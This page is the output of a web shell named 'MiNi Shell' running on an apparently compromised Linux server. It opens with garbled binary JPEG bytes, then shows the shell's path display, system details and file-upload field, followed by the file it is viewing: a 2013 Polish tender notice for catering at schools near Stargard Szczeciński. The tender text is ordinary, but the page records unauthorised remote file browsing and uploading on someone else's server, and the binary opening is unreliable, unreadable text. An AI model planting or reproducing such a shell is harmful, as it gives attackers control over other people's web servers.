JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20131029/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20131029/227311-N-2013.html

<p class="kh_header"><b>Stargard Szczeciński: Zapewnienie cateringu na potrzeby projektu W stronę osiągnięć - system doskonalenia nauczycieli i wspomagania szkół oraz przedszkoli w Powiecie stargardzkim</b><br>
<b>Numer ogłoszenia: 227311 - 2013; data zamieszczenia: 29.10.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiatowy Ośrodek Doskonalenia Nauczycieli , Plac Majdanek 7, 73-110 Stargard Szczeciński, woj. zachodniopomorskie, tel. 91 578 67 80, faks 91 578 67 80.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://podn.nbip.pl/podn/</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: ośrodek doskonalenia nauczycieli.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zapewnienie cateringu na potrzeby projektu W stronę osiągnięć - system doskonalenia nauczycieli i wspomagania szkół oraz przedszkoli w Powiecie stargardzkim.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Przedmiotem zamówienia jest świadczenie przez Wykonawcę usług cateringowych:  przygotowania i dowozu posiłków w terminach i w miejscach wskazanych przez Zamawiającego  oraz obsługi w trakcie trwania spotkań. 
Miejsca realizacji cateringu:
PRZEDSZKOLA 	 
PM NR 1 	ul. Spichrzowa 6, 73-110 Stargard Szczeciński
PM NR 3 	Os. Zachód A18, 73-110 Stargard Szczeciński
PM NR 5 	ul. Lechicka 11, 73-110 Stargard Szczeciński
NP. SMERFUŚ	ul. Warszawska 11b, 73-110 Stargard Szczeciński
NP. WESOŁA LOK.	ul. Szczecińska 33, 73-110 Stargard Szczeciński
SZKOŁY PODSTAWOWE	
SP 1 	ul. Sienkiewicza 8, 73-110 Stargard Szczeciński
SP 2	Os. Zachód A/5, 73-110 Stargard Szczeciński
SP GRZĘDZICE	Grzędzice 9-10, 73-110 Stargard Szczeciński
SP STRACHOCIN	Strachocin 26, 73-110 Stargard Szczeciński
SP SUCHAŃ	ul. Hlonda 1, 73-132 Suchań
SP MARIANOWO 	ul. Jeziorna 15, 73-121 Marianowo
SP KOBYLANKA	ul. Szkolna 10, 73-108 Kobylanka
SP KUNOWO	Kunowo 45a, 73-110 Kunowo
SP W DOBROPOLU	Dobropole Pyrzyckie 7, 73-115 Dobropole Pyrzyckie
SP SĄDÓW 	Sądów 30, 73-115 Sądów
SP W DOLICACH	ul. Pyrzycka 1, 73-115 Dolice
SP W RZEPLINIE 	Rzeplino 63, 73-115 Dolice
GIMNAZJA 	
GIMNAZJUM NR 1	ul. Popiela 2, 73-110 Stargard Szczeciński
GIMNAZJUM NR 2	ul. Limanowskiego 9, 73-110 Stargard Szczeciński
GIMNAZJUM NR 3	ul. Szkolna 2, 73-110 Stargard Szczeciński
GIMNAZJUM NR 4	Os. Zachód b15, 73-110 Stargard Szczeciński
GIMNAZJUM INTEGRACYJNE	Os. Zachód A4, 73-110 Stargard Szczeciński
GIMNAZJUM W SUCHANIU 	ul. Hlonda 1, 73-132 Suchań
GIMNAZJUM MARIANOWO	ul. Mieszka I 2a, 73-121 Marianowo
GIMNAZJUM W DOLICACH 	ul. Ogrodowa 46, 73-115 Dolice
SZKOŁY PONADGIMNAZJALNE 
ZSZ NR 2 W ZS NR 2	Os. Zachód b15a, 73-110 Stargard Szczeciński
TECHN. ZAWODOWE W ZS NR 2	Os. Zachód b15a, 73-110 Stargard Szczeciński
ZSZ NR 3 (ZSBT)	ul. Składowa 2a, 73-110 Stargard Szczeciński
TECH. ZAWOD. NR 3 (ZSBT)	ul. Składowa 2a, 73-110 Stargard Szczeciński
I LO 	ul. Staszica 2, 73-110 Stargard Szczeciński
2.Świadczenie usług cateringowych będzie się odbywało sukcesywnie w okresie obowiązywania umowy, w ramach organizowanych przez Zamawiającego spotkań. Zamawiający przewiduje organizację 570 spotkań z SORE i ekspertami (łącznie 8 532 zestawów/osobę) oraz 30 spotkań z koordynatorem sieci oraz ekspertami (łącznie 600 zestawów/osobę). Liczba osób na spotkaniu - od 6 do 25. Dokładna ilość osób na danym spotkaniu, jak również miejsce i termin danego spotkania zostanie wykonawcy określone za pomocą faksu/drogą elektroniczną wskazane na minimum 3 dni przed terminem spotkania.
3.Usługi cateringowe będą serwowane w formie szwedzkiego stołu - dominująca forma spożycia na stojąco. Zamawiający zapewni stoliki do konsumpcji na stojąco.
4.Zamawiający określi na 3 dni przed spotkaniem jego termin, miejsce, zakres usługi tj. jej rodzaj,  liczbę uczestników, zgodnie z poniższym wyszczególnieniem. Zamawiający nie wyraża zgody na dokonywanie zmian w posiłkach wchodzących w skład danego zestawu usługi. Zamawiający poinformuje Wykonawcę o spotkaniu i zakresie usługi drogą elektroniczną lub faksem. 
5.W ramach zamówienia Wykonawca jest zobowiązany do:
świadczenia usług cateringowych, wyłącznie przy użyciu produktów spełniających normy jakości produktów spożywczych o ważnym okresie przydatności do spożycia, w opakowaniach posiadających stosowne atesty,
przestrzegania przepisów prawnych w zakresie przechowywania i przygotowywania artykułów spożywczych (m. in. ustawy z dnia 25 sierpnia 2006 r. o bezpieczeństwie żywności i żywienia (Dz.U. 171 poz.1225),
przygotowania i dekoracji stołów w sposób uzgodniony z Zamawiającym,
świadczenia usług cateringowych na zastawie jednorazowej, z użyciem sztućców, serwetek papierowych i materiałowych, obrusów materiałowych,
przygotowania ilości filiżanek/kubków na kawę/herbatę oraz talerzy, co najmniej o 50% większej niż ilość osób, dla których zostanie przygotowany catering,
estetycznego podawania posiłków,
dostarczenia posiłków na miejsce wskazane przez Zamawiającego najpóźniej na 30 min. przed rozpoczęciem spotkania
zebrania naczyń oraz resztek pokonsumpcyjnych najpóźniej 40 min. po zakończeniu spotkania
6.Dostawy będą się odbywać na koszt i ryzyko Wykonawcy.
7.Wykonawca zapewni, iż personel przygotowujący przedmiot zamówienia oraz obsługujący imprezy organizowane przez Zamawiającego, będzie dysponował aktualnymi zaświadczeniami sanitarno - epidemiologicznymi (książeczki zdrowia).
W przypadku oferowania produktów równoważnych Wykonawca ma obowiązek udowodnić, że zaproponowany przez niego produkt jest równoważny do wskazanego przez Zamawiającego, poprzez załączenie szczegółowego opisu zastosowanego zamiennika, oraz towaru zamienianego, z których będzie wynikało że produkt jest równoważny do wymaganego a także dołączenie próbki zamiennika w ilości jednej sztuki lub opakowania. Należy wskazać, jaki produkt jest zastępowany zamiennikiem (w zestawie). Niedostarczenie próbek, ich nieopisanie lub niespełnienie przez próbki wymagań Zamawiającego skutkować będzie odrzuceniem oferty na podstawie art. 89 ust. 1 pkt 2 Ustawy PZP, po wcześniejszym uczynieniu zadość wymaganiu określonemu w art. 26 ust. 3 PZP. Próbki muszą być opisane: zestawu, opis pozycji zestawu z podaniem ceny. Po przetestowaniu próbki nie będą podlegały zwrotowi.
WYKAZ  ZESTAWÓW
ZESTAW dla jednego uczestnika:
I. Kanapki 4 szt./60g
Kanapki dekoracyjne w tym:
kanapki z masłem, serem typu camembert i dodatkami: z sosem z żurawiny i zieloną sałatą,
kanapki z masłem, szynką drobiową i żółtym serem oraz dodatkami: ogórkiem zielonym, surowym, pomidorem, oliwkami, przystrojenie: ketchup, majonez,
kanapki z masłem, łososiem i dodatkami: papryką, pomidorami, przystrojenie: majonez, koperek,
kanapki z masłem, salami i dodatkami: pomidorem, ogórkiem zielonym, surowym, oliwkami, przystrojenie: ketchup, majonez.
II. Bufet deserowy
sernik                                   1 porcja/100g
jabłecznik                             1 porcja/100g
ciastka kruche mieszane      1 porcji/100 g
III. Napoje gorące
kawa rozpuszczalna lub herbata czarna           1 porcja/220 ml
mleko                                  1szt./10ml
cytryna porcjowana           1 szt.
cukier                                 1 szt. /5g
IV. Napoje zimne
sok owocowy (jabłkowy i pomarańczowy)       1 porcja /200 ml
woda mineralna niegazowana                          1 butelka /500ml
woda mineralna gazowana                               1 butelka /500ml
UWAGA:
Zamawiający wymaga, aby świadczona usługa cateringu wykonywana była przy użyciu produktów renomowanych producentów (np. kawa Jacobs, Tchibo, Dallmayr, Nescafe lub równoważna, herbata Lipton, Dilmah lub równoważne, wędliny - Tarczyński, Sokołów, lub równoważne, woda - żywiec, Staropolanka lub równoważne, soki - Cappy, Hortex, Fortuna lub równoważne). Wyklucza się w tych przypadkach użycie produktów sprzedawanych pod marką marketu oraz produktów no-name.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 55.32.00.00-9, 55.32.10.00-6, 55.52.00.00-1, 55.52.12.00-0.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.06.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>zamawiający nie precyzuje warunku w tym zakresie</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający wymaga, aby Wykonawcy składający ofertę wykazali się, w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, należytym wykonaniem lub wykonywaniem co najmniej dwóch zamówień polegających na zapewnieniu cateringu na kwotę nie mniejszą niż 20 000,00 PLN każde, spełnia/nie spełnia</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>zamawiający nie precyzuje warunku w tym zakresie</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>zamawiający nie precyzuje warunku w tym zakresie</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>zamawiający nie precyzuje warunku w tym zakresie</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">próbki, opisy lub fotografie produktów, które mają zostać dostarczone, których autentyczność musi zostać poświadczona przez wykonawcę na żądanie zamawiającego;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1)Formularz ofertowy - załącznik nr 1</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.Zamawiający przewiduje możliwość wprowadzania zmian do niniejszej Umowy w przypadku:
1)zmian Zasad finansowania Programu Operacyjnego Kapitał Ludzki lub Wytycznych w zakresie kwalifikowania wydatków w ramach Programu Operacyjnego Kapitał Ludzki,
2)zmian przepisów prawa powszechnie obowiązującego,
3)zmiany terminu lub miejsca realizacji zamówienia,
2.Zmiany, o których mowa w ust. 1 pkt 1, mogą być dokonywane przez Zamawiającego w drodze pisemnego powiadomienia drugiej strony niniejszej Umowy.
3.Inna zmiana postanowień niniejszej umowy wymaga formy pisemnej w postaci aneksu, pod rygorem nieważności.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://podn.nbip.pl/podn/<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Powiatowy Ośrodek Doskonalenia Nauczycieli
plac Majdanek 7
73-110 Stargard Szczeciński.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 06.11.2013 godzina 09:45, miejsce: Powiatowy Ośrodek Doskonalenia Nauczycieli
plac Majdanek 7
73-110 Stargard Szczeciński.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> W stronę osiągnięć - system doskonalenia nauczycieli i wspomagania szkół oraz przedszkoli w Powiecie stargardzkim, PO KL.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com